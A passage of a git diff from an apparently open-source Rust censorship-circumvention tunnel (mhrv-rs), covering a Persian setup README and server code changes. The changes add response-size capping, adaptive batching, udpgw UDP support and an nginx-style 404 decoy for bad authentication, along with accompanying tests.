`changeme` | secret مشترک — باید با `TUNNEL_AUTH_KEY` در CodeFull.gs match کنه | +| `PORT` | خیر | `8080` | پورت listen (Cloud Run خودش این رو ست می‌کنه) | +| `MHRV_DIAGNOSTIC` | خیر | (off) | اگه `1` باشه، روی auth بد به‌جای decoy 404 nginx، JSON `{"e":"unauthorized"}` صریح برمی‌گردونه. **فقط برای setup/debug** — قبل از public کردن tunnel-node خاموشش کن. (v1.8.0+) | + +## پروتکل + +### تک op: `POST /tunnel` + +```json +{"k":"auth","op":"connect","host":"example.com","port":443} +{"k":"auth","op":"data","sid":"uuid","data":"base64"} +{"k":"auth","op":"close","sid":"uuid"} +``` + +### Batch: `POST /tunnel/batch` + +```json +{ + "k": "auth", + "ops": [ + {"op":"data","sid":"uuid1","d":"base64"}, + {"op":"udp_data","sid":"uuid2","d":"base64"}, + {"op":"close","sid":"uuid3"} + ] +} +→ {"r": [{...}, {...}, {...}]} +``` + +### Health check: `GET /health` → `ok` + +## Performance: تعداد deployment و عمق pipeline + +کلاینت mhrv-rs در حالت Full یک batch-multiplexer pipelined اجرا می‌کنه. هر روند-تریپ Apps Script حدود ۲ ثانیه طول می‌کشه، پس کلاینت چندین request batch همزمان شلیک می‌کنه — عمق pipeline برابر تعداد deployment ID‌های Apps Script هست (حداقل ۲، بدون سقف بالا). + +تعداد deployment بیشتر = batchهای همزمان بیشتر روی tunnel-node = latency پایین‌تر برای session. با ۶ deployment، هر ۰.۳ ثانیه یه batch جدید می‌رسه (به‌جای هر ۲ ثانیه). + +خود tunnel-node per-request stateless هست (session‌ها بر اساس UUID key می‌شن)، پس batchهای همزمان رو طبیعی handle می‌کنه. برای بهترین نتیجه، ۳–۱۲ Apps Script روی account‌های Google جداگانه deploy کن و همهٔ deployment ID‌ها رو در config کلاینت لیست کن. + +--- + +## سؤالات رایج + +### حجم مصرف چقدره؟ + +سه لایه overhead هست در حالت Full: + +1. **Base64 encoding** برای data ها در JSON envelope = ~۳۳٪ overhead روی payload (4 byte per 3 byte raw) +2. **JSON envelope + headers** = ~۵-۱۵٪ overhead بسته به اندازه payload +3. **Random padding (v1.8.0+)** برای DPI defense = متوسط ۵۱۲ بایت اضافه به هر batch + +تخمین کلی: اگه ۱ GB دانلود می‌کنی، ~۱.۲۵-۱.۳ GB روی پهنای باند VPS مصرف می‌کنه. + +برای ۲۰ GB ماهانه استفاده روزمره (browsing + Telegram + ویدیو متوسط)، ~۲۵-۲۷ GB پهنای باند VPS لازم داری. Hetzner CX11 (€۴/ماه) ۲۰ TB ماهانه می‌ده — یعنی به سقف نمی‌رسی مگه streaming سنگین. + +### روی موبایل کل برنامه‌ها رو بالا میاره؟ + +**بستگی به Mode داره:** + +- **mhrv-rs Android در Tunnel mode (Operating Mode → Tunnel)** + Full + tunnel-node = ✅ کل ترافیک Android (شامل YouTube، Telegram MTProto، Instagram، Snapchat، هر چیزی) capture می‌شه. این از VpnService استفاده می‌کنه. +- **mhrv-rs Android در Proxy mode** + Full + tunnel-node = فقط app‌هایی که proxy رو صریحاً respect می‌کنن (Chrome، Firefox، برخی app‌های Telegram-فارسی). YouTube/Insta/Telegram اصلی proxy رو نادیده می‌گیرن + از mhrv-rs رد نمی‌شن. + +برای اینکه «همهٔ app‌ها بیان» = حتماً **Tunnel mode** فعال کن. + +### سرعت چقدر خوبه؟ + +برای یک flow (یک download، یک ویدیو، یک TCP connection) معمولاً **۵۰–۲۰۰ KB/s** هست. علت: + +- Apps Script روند-تریپ floor ~۲۰۰-۵۰۰ ms داره (غیر قابل پایین آوردن، Google-side limit) +- هر batch به یک deployment باند می‌شه + هر flow به یک batch +- در نتیجه per-flow throughput = batch_size / batch_round_trip = (~۶۴-۲۵۶ KB) / (~۲۵۰-۵۰۰ ms) ≈ ۱۲۸-۵۰۰ KB/s ceiling + +برای **چند flow همزمان** (browsing با چند تب، Telegram + YouTube همزمان)، throughput جمعی به sum از همه flow‌ها مقیاس می‌خوره — با ۶ deployment روی ۶ Google account می‌تونی ۶ flow همزمان داشته باشی. + +**توصیه واقع‌بینانه:** برای browsing عادی + chat + ویدیو متوسط = کافیه. برای دانلود فایل‌های بزرگ سریع، **Wireguard مستقیم روی همان VPS** ابزار درست‌تره (۵-۱۰x سریع‌تر، چون Apps Script رو دور می‌زنه). mhrv-rs ارزش اصلیش لایه «دور زدن censorship با domain-fronting» هست، نه سرعت raw — وقتی به اون لایه نیاز نداری (مسیر مستقیم به VPS باز هست)، ابزار ساده‌تر بهتره. + +### آیا VPS لازمه؟ + +برای **حالت Full** (شامل Telegram، YouTube بدون 60s SABR cliff، WebSockets، MTProto و هر چیزی غیر-HTTPS-ساده): **بله، VPS الزامی هست**. + +برای **حالت `apps_script`** (browsing فقط HTTPS): **خیر، نیاز به VPS نیست** — فقط نیاز به Apps Script setup روی Google account داری. + +برای **حالت `direct`** (Google services مثل Search/Gmail/YouTube، به علاوهٔ هر `fronting_groups` که تنظیم کرده باشید): **نه VPS لازمه نه Apps Script** — فقط تونل بازنویسی `SNI`. (نام قبلی این حالت `google_only` بود.) + +### چه VPS‌ای پیشنهاد می‌شه؟ + +- **Hetzner CX11** (Falkenstein/Helsinki، €۴/ماه) — best value، ۲۰ TB ماهانه، خوب برای کاربران اروپا/خاورمیانه +- **DigitalOcean basic droplet** ($۶/ماه، NYC/SFO) — برای کاربران آمریکا +- **Google Cloud Run** (free tier تا ۲ میلیون request/ماه + ۵ GB egress) — تنها provider که destination IP اصلاً Google هست، پس مسیر Iran→Apps Script→Cloud-Run-tunnel-node کاملاً درون شبکه Google می‌مونه و ISP filter نمی‌بینه. **بهترین گزینه برای کاربران ایرانی متأثر از [#313](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/313)**. + +برای راهنمای قدم‌به‌قدم setup: [#310 reply (راهنمای فارسی)](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/310#issuecomment-4326086988). diff --git a/tunnel-node/README.md b/tunnel-node/README.md index 88d884ba..529c15e3 100644 --- a/tunnel-node/README.md +++ b/tunnel-node/README.md @@ -1,5 +1,7 @@ # Tunnel Node +> *Persian / فارسی: [README.fa.md](./README.fa.md)* + HTTP tunnel bridge server for MasterHttpRelayVPN "full" mode. Bridges HTTP tunnel requests (from Apps Script) to real TCP connections. ## Architecture diff --git a/tunnel-node/src/main.rs b/tunnel-node/src/main.rs index e03ff5e8..69e361cb 100644 --- a/tunnel-node/src/main.rs +++ b/tunnel-node/src/main.rs @@ -22,12 +22,14 @@ use axum::{routing::post, Json, Router}; use base64::engine::general_purpose::STANDARD as B64; use base64::Engine; use serde::{Deserialize, Serialize}; -use tokio::io::{AsyncReadExt, AsyncWriteExt}; -use tokio::net::tcp::{OwnedReadHalf, OwnedWriteHalf}; +use tokio::io::{AsyncRead, AsyncReadExt, AsyncWriteExt}; +use tokio::net::tcp::OwnedWriteHalf; use tokio::net::{lookup_host, TcpStream, UdpSocket}; use tokio::sync::{mpsc, Mutex, Notify}; use tokio::task::JoinSet; +mod udpgw; + /// Structured error code returned when the tunnel-node receives an op it /// doesn't recognize. Clients use this (rather than string-matching `e`) to /// detect a version mismatch and gracefully fall back. @@ -40,16 +42,13 @@ const CODE_UNSUPPORTED_OP: &str = "UNSUPPORTED_OP"; /// milliseconds — once any session in the batch fires its notify. const ACTIVE_DRAIN_DEADLINE: Duration = Duration::from_millis(350); -/// After the first session in an active batch wakes the wait, we sleep -/// briefly so neighboring sessions whose responses land just after the -/// first one don't get reported empty and pay an extra round-trip. Only -/// applies to active batches — for long-poll batches the wake event IS -/// the data we want, so we deliver it immediately. -/// -/// 30 ms is much shorter than the legacy two-pass retry (150 + 200 ms) -/// but covers the typical case of co-located upstreams whose RTTs -/// cluster within a few tens of ms of each other. -const STRAGGLER_SETTLE: Duration = Duration::from_millis(30); +/// Adaptive straggler settle: after the first session in an active batch +/// wakes the drain, keep checking in STEP increments whether new data is +/// still arriving. Stops when no new data arrived in the last STEP (the +/// burst is over) or MAX is reached. Packing more session responses into +/// one batch saves quota on high-latency relays (~1.5s Apps Script overhead). +const STRAGGLER_SETTLE_STEP: Duration = Duration::from_millis(40); +const STRAGGLER_SETTLE_MAX: Duration = Duration::from_millis(500); /// Drain-phase deadline when the batch is a pure poll (no writes, no new /// connections — clients just asking "any push data?"). Holding the @@ -63,18 +62,16 @@ const STRAGGLER_SETTLE: Duration = Duration::from_millis(30); /// op per session), so any local bytes that arrive while the poll is /// being held are stuck in the kernel until the poll returns. /// -/// * Lower (e.g. 2 s) — interactive shells / typing-burst flows feel -/// snappier, but push-only sessions pay more empty round-trips. -/// * Higher (e.g. 20 s) — push delivery is near-RTT and round-trip -/// count is minimal, but a thinking pause between keystrokes can -/// tax the next keystroke by up to the chosen value. -/// -/// 5 s is a middle ground: a typing user pausing mid-thought pays at -/// most a 5 s nudge before their next keystroke flows, while idle -/// sessions still get the bulk of the long-poll benefit. Must also -/// stay safely below the client's `BATCH_TIMEOUT` (30 s) and Apps -/// Script's UrlFetch ceiling (~60 s). -const LONGPOLL_DEADLINE: Duration = Duration::from_secs(5); +/// 15 s keeps persistent connections (Telegram XMPP on :5222, Google +/// Push on :5228) alive without forcing frequent reconnects. At 5 s, +/// apps like Telegram interpreted the frequent empty returns as +/// connection instability and rotated sessions — each reconnect costs +/// a full TLS handshake (~4 s through Apps Script), causing visible +/// video/voice interruptions. 15 s is well below the client's +/// `BATCH_TIMEOUT` (30 s) and Apps Script's UrlFetch ceiling (~60 s). +/// Tested on censored networks in Iran where users reported smoother +/// Telegram video playback and fewer session resets at this value. +const LONGPOLL_DEADLINE: Duration = Duration::from_secs(15); /// Bound on each UDP session's inbound queue. Beyond this we drop oldest /// to keep recent voice/media packets moving — a stale RTP frame is @@ -86,6 +83,22 @@ const UDP_QUEUE_LIMIT: usize = 256; /// a maximum-size IPv4 datagram without truncation. const UDP_RECV_BUF_BYTES: usize = 65536; +/// Maximum raw bytes per TCP drain that we hand back to Apps Script in +/// one batch response. Apps Script's hard cap on Web App response body +/// is ~50 MiB. Accounting for base64 encoding (1.33×) and JSON envelope +/// overhead, the safe ceiling for raw bytes is roughly 32 MiB — but +/// `serde_json::to_vec` for a single 32-MiB string is also a CPU spike, +/// so we lean further back at 16 MiB. On a high-bandwidth VPS (1 Gbps+) +/// the reader task can stuff the per-session buffer with tens of MiB +/// between polls (issue #460); without this cap, `drain_now` would take +/// the lot, the response would exceed Apps Script's ceiling, the body +/// would be truncated mid-base64, and the client would fail JSON parse +/// with `EOF while parsing a string at line 1 column ~52428685`. By +/// returning at most this many bytes per drain and leaving the rest in +/// the read buffer for the next poll, we keep responses comfortably +/// under the cap and let throughput recover across batches. +const TCP_DRAIN_MAX_BYTES: usize = 16 * 1024 * 1024; + /// First queue-drop on a session always logs at warn level; subsequent /// drops log at debug only every Nth occurrence so a single congested /// session can't flood the operator's log. @@ -95,8 +108,30 @@ const UDP_QUEUE_DROP_LOG_STRIDE: u64 = 100; // Session // --------------------------------------------------------------------------- +/// Writer half — either a real TCP socket or an in-process duplex channel +/// (used for virtual sessions like udpgw). +enum SessionWriter { + Tcp(OwnedWriteHalf), + Duplex(tokio::io::WriteHalf), +} + +impl SessionWriter { + async fn write_all(&mut self, buf: &[u8]) -> std::io::Result<()> { + match self { + SessionWriter::Tcp(w) => w.write_all(buf).await, + SessionWriter::Duplex(w) => w.write_all(buf).await, + } + } + async fn flush(&mut self) -> std::io::Result<()> { + match self { + SessionWriter::Tcp(w) => w.flush().await, + SessionWriter::Duplex(w) => w.flush().await, + } + } +} + struct SessionInner { - writer: Mutex, + writer: Mutex, read_buf: Mutex>, eof: AtomicBool, last_active: Mutex, @@ -110,6 +145,17 @@ struct SessionInner { struct ManagedSession { inner: Arc, reader_handle: tokio::task::JoinHandle<()>, + /// For udpgw sessions, the server task handle (so we can abort on close). + udpgw_handle: Option>, +} + +impl ManagedSession { + fn abort_all(&self) { + self.reader_handle.abort(); + if let Some(ref h) = self.udpgw_handle { + h.abort(); + } + } } /// UDP equivalent of `SessionInner`. Holds a *connected* `UdpSocket` @@ -148,7 +194,7 @@ async fn create_session(host: &str, port: u16) -> std::io::Result std::io::Result) { +/// Create a virtual udpgw session backed by an in-process duplex channel. +fn create_udpgw_session() -> ManagedSession { + let (client_half, server_half) = tokio::io::duplex(65536); + let (read_half, write_half) = tokio::io::split(client_half); + + let inner = Arc::new(SessionInner { + writer: Mutex::new(SessionWriter::Duplex(write_half)), + read_buf: Mutex::new(Vec::with_capacity(32768)), + eof: AtomicBool::new(false), + last_active: Mutex::new(Instant::now()), + notify: Notify::new(), + }); + + let inner_ref = inner.clone(); + let reader_handle = tokio::spawn(reader_task(read_half, inner_ref)); + let udpgw_handle = Some(tokio::spawn(udpgw::udpgw_server_task(server_half))); + + ManagedSession { inner, reader_handle, udpgw_handle } +} + +async fn reader_task(mut reader: impl AsyncRead + Unpin, session: Arc) { let mut buf = vec![0u8; 65536]; loop { match reader.read(&mut buf).await { @@ -274,13 +340,33 @@ async fn udp_reader_task(socket: Arc, session: Arc) } } -/// Drain whatever is currently buffered — no waiting. -/// Used by batch mode where we poll frequently. +/// Drain up to `TCP_DRAIN_MAX_BYTES` from the per-session read buffer — +/// no waiting. Used by batch mode where we poll frequently. +/// +/// If the buffer is larger than the cap, we return a prefix of the +/// data and leave the remainder in the buffer for the next poll. The +/// cap exists to keep batch responses under Apps Script's ~50 MiB body +/// ceiling on high-bandwidth VPS — see `TCP_DRAIN_MAX_BYTES` for the +/// underlying issue (#460). +/// +/// `eof` is reported as true only when the buffer has been fully +/// drained AND upstream has signaled EOF — otherwise a partial drain +/// would prematurely tear the session down on the client side. async fn drain_now(session: &SessionInner) -> (Vec, bool) { let mut buf = session.read_buf.lock().await; - let data = std::mem::take(&mut *buf); - let eof = session.eof.load(Ordering::Acquire); - (data, eof) + let raw_eof = session.eof.load(Ordering::Acquire); + if buf.len() <= TCP_DRAIN_MAX_BYTES { + let data = std::mem::take(&mut *buf); + (data, raw_eof) + } else { + // Take the prefix; leave the tail in the buffer. + let tail = buf.split_off(TCP_DRAIN_MAX_BYTES); + let head = std::mem::replace(&mut *buf, tail); + // Don't propagate eof yet — buffer still has data even if upstream + // has closed. The client will get eof on the drain that returns + // an empty (or sub-cap) buffer. + (head, false) + } } /// Block until *any* of `inners` has buffered data, hits EOF, or the @@ -480,6 +566,16 @@ struct AppState { sessions: Arc>>, udp_sessions: Arc>>, auth_key: String, + /// Active probing defense: when false (default, production), bad + /// AUTH_KEY responses are a generic-looking 404 with no JSON-shaped + /// "unauthorized" body — same as a static nginx 404. Active scanners + /// that POST malformed payloads to `/tunnel` to discover proxy + /// endpoints categorize this as a non-tunnel host and move on. + /// Enable via `MHRV_DIAGNOSTIC=1` for setup/debugging — restores the + /// previous JSON `{"e":"unauthorized"}` body so it's clear *which* + /// of "wrong key", "wrong URL path", or "wrong tunnel-node" you've + /// hit. (Inspired by #365 Section 3.) + diagnostic_mode: bool, } // --------------------------------------------------------------------------- @@ -553,19 +649,41 @@ struct BatchResponse { async fn handle_tunnel( State(state): State, Json(req): Json, -) -> Json { +) -> axum::response::Response { if req.k != state.auth_key { - return Json(TunnelResponse::error("unauthorized")); + return decoy_or_unauthorized(state.diagnostic_mode); } - match req.op.as_str() { - "connect" => Json(handle_connect(&state, req.host, req.port).await), + let resp: TunnelResponse = match req.op.as_str() { + "connect" => handle_connect(&state, req.host, req.port).await, "connect_data" => { - Json(handle_connect_data_single(&state, req.host, req.port, req.data).await) + handle_connect_data_single(&state, req.host, req.port, req.data).await } - "data" => Json(handle_data_single(&state, req.sid, req.data).await), - "close" => Json(handle_close(&state, req.sid).await), - other => Json(TunnelResponse::unsupported_op(other)), - } + "data" => handle_data_single(&state, req.sid, req.data).await, + "close" => handle_close(&state, req.sid).await, + other => TunnelResponse::unsupported_op(other), + }; + Json(resp).into_response() +} + +/// Active-probing defense for the bad-auth path. Production default is +/// a 404 with a generic "Not Found" HTML body that mimics a vanilla +/// nginx/apache static error page — active scanners categorize this +/// as a regular web server with nothing interesting and move on. +/// `MHRV_DIAGNOSTIC=1` restores the previous JSON `{"e":"unauthorized"}` +/// body so misconfigured clients get a clear error during setup. +fn decoy_or_unauthorized(diagnostic_mode: bool) -> axum::response::Response { + if diagnostic_mode { + return Json(TunnelResponse::error("unauthorized")).into_response(); + } + let body = "\r\n404 Not Found\r\n\ + \r\n

404 Not Found

\r\n\ +
nginx
\r\n\r\n\r\n"; + ( + StatusCode::NOT_FOUND, + [(header::CONTENT_TYPE, "text/html")], + body, + ) + .into_response() } // --------------------------------------------------------------------------- @@ -602,10 +720,20 @@ async fn handle_batch( }; if req.k != state.auth_key { - let resp = serde_json::to_vec(&BatchResponse { - r: vec![TunnelResponse::error("unauthorized")], - }).unwrap_or_default(); - return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp); + if state.diagnostic_mode { + let resp = serde_json::to_vec(&BatchResponse { + r: vec![TunnelResponse::error("unauthorized")], + }).unwrap_or_default(); + return (StatusCode::OK, [(header::CONTENT_TYPE, "application/json")], resp); + } + // Production: same nginx-404 decoy as the single-op path. See + // `decoy_or_unauthorized` for rationale. + let body = "\r\n404 Not Found\r\n\ + \r\n

404 Not Found

\r\n\ +
nginx
\r\n\r\n\r\n" + .as_bytes() + .to_vec(); + return (StatusCode::NOT_FOUND, [(header::CONTENT_TYPE, "text/html")], body); } // Process all ops in two phases. @@ -817,7 +945,6 @@ async fn handle_batch( .collect() }; - let wait_start = Instant::now(); // Wait for either side to wake. Running both concurrently means // a TCP-only batch isn't slowed by a stale UDP watch list, and // vice versa. @@ -827,9 +954,45 @@ async fn handle_batch( ); if had_writes_or_connects { - let remaining = deadline.saturating_sub(wait_start.elapsed()); - if !remaining.is_zero() { - tokio::time::sleep(STRAGGLER_SETTLE.min(remaining)).await; + // Adaptive settle: keep waiting in steps while new data + // keeps arriving. Break when: + // 1. No new data arrived in the last step (burst is over) + // 2. 500ms max reached + let settle_end = Instant::now() + STRAGGLER_SETTLE_MAX; + let mut prev_tcp_bytes: usize = 0; + let mut prev_udp_pkts: usize = 0; + // Snapshot current buffer sizes. + for inner in &tcp_inners { + prev_tcp_bytes += inner.read_buf.lock().await.len(); + } + for inner in &udp_inners { + prev_udp_pkts += inner.packets.lock().await.len(); + } + loop { + let now = Instant::now(); + if now >= settle_end { + break; + } + let remaining = settle_end.duration_since(now); + tokio::time::sleep(STRAGGLER_SETTLE_STEP.min(remaining)).await; + + // Measure current buffer sizes. + let mut tcp_bytes: usize = 0; + let mut udp_pkts: usize = 0; + for inner in &tcp_inners { + tcp_bytes += inner.read_buf.lock().await.len(); + } + for inner in &udp_inners { + udp_pkts += inner.packets.lock().await.len(); + } + + // No new data since last step — burst is over. + if tcp_bytes == prev_tcp_bytes && udp_pkts == prev_udp_pkts { + break; + } + + prev_tcp_bytes = tcp_bytes; + prev_udp_pkts = udp_pkts; } } @@ -971,9 +1134,13 @@ async fn handle_connect(state: &AppState, host: Option, port: Option v, Err(r) => return r, }; - let session = match create_session(&host, port).await { - Ok(s) => s, - Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)), + let session = if udpgw::is_udpgw_dest(&host, port) { + create_udpgw_session() + } else { + match create_session(&host, port).await { + Ok(s) => s, + Err(e) => return TunnelResponse::error(format!("connect failed: {}", e)), + } }; let sid = uuid::Uuid::new_v4().to_string(); tracing::info!("session {} -> {}:{}", sid, host, port); @@ -995,9 +1162,13 @@ async fn handle_connect_data_phase1( ) -> Result<(String, Arc), TunnelResponse> { let (host, port) = validate_host_port(host, port)?; - let session = create_session(&host, port) - .await - .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))?; + let session = if udpgw::is_udpgw_dest(&host, port) { + create_udpgw_session() + } else { + create_session(&host, port) + .await + .map_err(|e| TunnelResponse::error(format!("connect failed: {}", e)))? + }; // Any failure below this point must abort the reader task, otherwise // the newly-opened upstream TCP connection would leak. Keep the @@ -1146,7 +1317,7 @@ async fn handle_close(state: &AppState, sid: Option) -> TunnelResponse { _ => return TunnelResponse::error("missing sid"), }; if let Some(s) = state.sessions.lock().await.remove(&sid) { - s.reader_handle.abort(); + s.abort_all(); tracing::info!("session {} closed by client", sid); } if let Some(s) = state.udp_sessions.lock().await.remove(&sid) { @@ -1234,7 +1405,24 @@ async fn main() { .init(); let auth_key = std::env::var("TUNNEL_AUTH_KEY").unwrap_or_else(|_| { - tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)"); + // Catch the recurring `MHRV_AUTH_KEY` typo (#391, #444). Several old + // copy-paste guides used `MHRV_AUTH_KEY` for the docker run; tunnel-node + // never read that name and silently fell through to `changeme`, + // producing baffling AUTH_KEY-mismatch decoys on the client. If + // `MHRV_AUTH_KEY` is set, point at it specifically so the user sees + // why their value isn't taking effect. + if std::env::var("MHRV_AUTH_KEY").is_ok() { + tracing::warn!( + "MHRV_AUTH_KEY is set but TUNNEL_AUTH_KEY is not — \ + tunnel-node only reads TUNNEL_AUTH_KEY (uppercase, with \ + underscores). Rename your env var: \ + `docker run ... -e TUNNEL_AUTH_KEY=`. Falling \ + back to default `changeme` for now (INSECURE — clients will \ + fail with AUTH_KEY mismatch decoys until this is fixed)." + ); + } else { + tracing::warn!("TUNNEL_AUTH_KEY not set — using default (INSECURE)"); + } "changeme".into() }); let port: u16 = std::env::var("PORT") @@ -1248,7 +1436,20 @@ async fn main() { Arc::new(Mutex::new(HashMap::new())); tokio::spawn(cleanup_task(sessions.clone(), udp_sessions.clone())); - let state = AppState { sessions, udp_sessions, auth_key }; + // MHRV_DIAGNOSTIC=1 in env restores verbose JSON error responses on + // bad auth (instead of the nginx-404 decoy). Use during setup so + // misconfigured clients see "unauthorized"; flip back off in prod. + let diagnostic_mode = std::env::var("MHRV_DIAGNOSTIC") + .map(|v| v == "1" || v.eq_ignore_ascii_case("true")) + .unwrap_or(false); + if diagnostic_mode { + tracing::warn!( + "MHRV_DIAGNOSTIC=1 — bad-auth responses are verbose JSON \ + errors instead of the production nginx-404 decoy. Disable \ + before exposing this tunnel-node to the public internet." + ); + } + let state = AppState { sessions, udp_sessions, auth_key, diagnostic_mode }; let app = Router::new() .route("/tunnel", post(handle_tunnel)) @@ -1283,6 +1484,10 @@ mod tests { sessions: Arc::new(Mutex::new(HashMap::new())), udp_sessions: Arc::new(Mutex::new(HashMap::new())), auth_key: "test-key".into(), + // Tests assert against the JSON `unauthorized` body shape + // (see e.g. `bad_auth_returns_unauthorized`), so they need + // diagnostic_mode enabled. Production default is false. + diagnostic_mode: true, } } @@ -1430,7 +1635,7 @@ mod tests { let (_reader, writer) = client.into_split(); Arc::new(SessionInner { - writer: Mutex::new(writer), + writer: Mutex::new(SessionWriter::Tcp(writer)), read_buf: Mutex::new(Vec::new()), eof: AtomicBool::new(false), last_active: Mutex::new(Instant::now()), @@ -1438,6 +1643,61 @@ mod tests { }) } + #[tokio::test] + async fn drain_now_caps_at_tcp_drain_max_bytes() { + // Issue #460: a 1 Gbps VPS reader fills the buffer with tens of MiB + // between polls; drain_now used to take the lot, the JSON response + // exceeded Apps Script's body cap, and the client failed JSON parse. + // The cap leaves the tail in the buffer for the next drain. + let inner = fake_inner().await; + let oversized = TCP_DRAIN_MAX_BYTES + 4096; + inner.read_buf.lock().await.resize(oversized, 0xab); + + let (first, eof) = drain_now(&inner).await; + assert_eq!(first.len(), TCP_DRAIN_MAX_BYTES); + assert!(!eof, "shouldn't propagate eof while buffer still has data"); + + // Tail remains for the next poll. + assert_eq!(inner.read_buf.lock().await.len(), 4096); + + let (second, _) = drain_now(&inner).await; + assert_eq!(second.len(), 4096); + assert!(inner.read_buf.lock().await.is_empty()); + } + + #[tokio::test] + async fn drain_now_passes_through_when_under_cap() { + let inner = fake_inner().await; + inner.read_buf.lock().await.extend_from_slice(b"hello world"); + + let (data, eof) = drain_now(&inner).await; + assert_eq!(data, b"hello world"); + assert!(!eof); + assert!(inner.read_buf.lock().await.is_empty()); + } + + #[tokio::test] + async fn drain_now_holds_eof_until_buffer_drained() { + // If upstream signals EOF while the buffer is still oversized, we + // must drain the head, leave the tail, and *not* set eof yet. + // Eof flips on the final drain that returns a sub-cap buffer. + let inner = fake_inner().await; + inner.eof.store(true, Ordering::Release); + inner + .read_buf + .lock() + .await + .resize(TCP_DRAIN_MAX_BYTES + 100, 0); + + let (head, head_eof) = drain_now(&inner).await; + assert_eq!(head.len(), TCP_DRAIN_MAX_BYTES); + assert!(!head_eof, "premature eof would tear the session"); + + let (tail, tail_eof) = drain_now(&inner).await; + assert_eq!(tail.len(), 100); + assert!(tail_eof, "eof finally flips when buffer is drained"); + } + #[tokio::test] async fn wait_for_any_drainable_returns_immediately_when_buffer_has_data() { let inner = fake_inner().await; @@ -1597,7 +1857,7 @@ mod tests { let stream = TcpStream::connect(addr).await.unwrap(); let (reader, writer) = stream.into_split(); let inner = Arc::new(SessionInner { - writer: Mutex::new(writer), + writer: Mutex::new(SessionWriter::Tcp(writer)), read_buf: Mutex::new(Vec::new()), eof: AtomicBool::new(false), last_active: Mutex::new(Instant::now()), diff --git a/tunnel-node/src/udpgw.rs b/tunnel-node/src/udpgw.rs new file mode 100644 index 00000000..3c6e1800 --- /dev/null +++ b/tunnel-node/src/udpgw.rs @@ -0,0 +1,512 @@ +//! Native implementation of the tun2proxy udpgw wire protocol. +//! +//! Wire format (all fields big-endian): +//! ```text +//! +-----+-------+---------+------+----------+----------+----------+ +//! | LEN | FLAGS | CONN_ID | ATYP | DST.ADDR | DST.PORT | DATA | +//! +-----+-------+---------+------+----------+----------+----------+ +//! | 2 | 1 | 2 | 1 | Variable | 2 | Variable | +//! +-----+-------+---------+------+----------+----------+----------+ +//! ``` +//! +//! Flags: KEEPALIVE=0x01, DATA=0x02, ERR=0x20 +//! ATYP: 0x01=IPv4(4B), 0x03=Domain(1B len + name), 0x04=IPv6(16B) + +use std::net::{Ipv4Addr, Ipv6Addr, SocketAddr, SocketAddrV4, SocketAddrV6}; +use std::sync::Arc; + +use tokio::io::{AsyncReadExt, AsyncWriteExt, DuplexStream}; +use tokio::net::UdpSocket; + +/// Magic address that the client connects to via the tunnel protocol. +/// `198.18.0.0/15` is reserved for benchmarking (RFC 2544) and will +/// never be a real destination. +pub const UDPGW_MAGIC_IP: [u8; 4] = [198, 18, 0, 1]; +pub const UDPGW_MAGIC_PORT: u16 = 7300; + +const FLAG_KEEPALIVE: u8 = 0x01; +const FLAG_DATA: u8 = 0x02; +const FLAG_ERR: u8 = 0x20; + +const ATYP_IPV4: u8 = 0x01; +const ATYP_DOMAIN: u8 = 0x03; +const ATYP_IPV6: u8 = 0x04; + +/// Maximum UDP payload we'll handle. +const UDP_MTU: usize = 10240; + +// ------------------------------------------------------------------------- +// Frame types +// ------------------------------------------------------------------------- + +#[derive(Debug, Clone)] +enum DstAddr { + V4(Ipv4Addr, u16), + V6(Ipv6Addr, u16), + Domain(String, u16), +} + +impl DstAddr { + fn to_socket_addr(&self) -> std::io::Result { + match self { + DstAddr::V4(ip, port) => Ok(SocketAddr::V4(SocketAddrV4::new(*ip, *port))), + DstAddr::V6(ip, port) => Ok(SocketAddr::V6(SocketAddrV6::new(*ip, *port, 0, 0))), + DstAddr::Domain(name, port) => { + use std::net::ToSocketAddrs; + (name.as_str(), *port) + .to_socket_addrs()? + .next() + .ok_or_else(|| std::io::Error::new(std::io::ErrorKind::AddrNotAvailable, "DNS resolution failed")) + } + } + } + + /// Serialise into SOCKS5 address format: ATYP + addr + port. + fn write_to(&self, buf: &mut Vec) { + match self { + DstAddr::V4(ip, port) => { + buf.push(ATYP_IPV4); + buf.extend_from_slice(&ip.octets()); + buf.extend_from_slice(&port.to_be_bytes()); + } + DstAddr::V6(ip, port) => { + buf.push(ATYP_IPV6); + buf.extend_from_slice(&ip.octets()); + buf.extend_from_slice(&port.to_be_bytes()); + } + DstAddr::Domain(name, port) => { + buf.push(ATYP_DOMAIN); + buf.push(name.len() as u8); + buf.extend_from_slice(name.as_bytes()); + buf.extend_from_slice(&port.to_be_bytes()); + } + } + } + + fn serialised_len(&self) -> usize { + match self { + DstAddr::V4(..) => 1 + 4 + 2, // ATYP + IPv4 + port + DstAddr::V6(..) => 1 + 16 + 2, // ATYP + IPv6 + port + DstAddr::Domain(n, _) => 1 + 1 + n.len() + 2, // ATYP + len + name + port + } + } +} + +#[derive(Debug)] +struct Frame { + flags: u8, + conn_id: u16, + addr: Option, + payload: Vec, +} + +// ------------------------------------------------------------------------- +// Parse / serialise +// ------------------------------------------------------------------------- + +/// Try to parse one frame from `buf`. Returns `(frame, bytes_consumed)` or +/// `None` if the buffer doesn't contain a complete frame yet. +fn try_parse_frame(buf: &[u8]) -> Result, std::io::Error> { + if buf.len() < 2 { + return Ok(None); + } + let body_len = u16::from_be_bytes([buf[0], buf[1]]) as usize; + let total = 2 + body_len; + if buf.len() < total { + return Ok(None); + } + + let body = &buf[2..total]; + if body.len() < 3 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "frame too short")); + } + let flags = body[0]; + let conn_id = u16::from_be_bytes([body[1], body[2]]); + let rest = &body[3..]; + + let (addr, payload_start) = if flags & FLAG_DATA != 0 { + // Parse SOCKS5-style address. + if rest.is_empty() { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "missing ATYP")); + } + let atyp = rest[0]; + match atyp { + ATYP_IPV4 => { + if rest.len() < 1 + 4 + 2 { + return Err(std::io::Error::new(std::io::ErrorKind::InvalidData, "short IPv4 addr")); + } + let ip = Ipv4Addr::new(rest[1], rest[2], rest[3], rest[4]); + let port = u16::from_be_bytes([rest[5], rest[6]]); + (Some(DstAddr::V4(ip, port)), 7) + } + ATYP_IPV6 => { + if rest.len() < 1 + 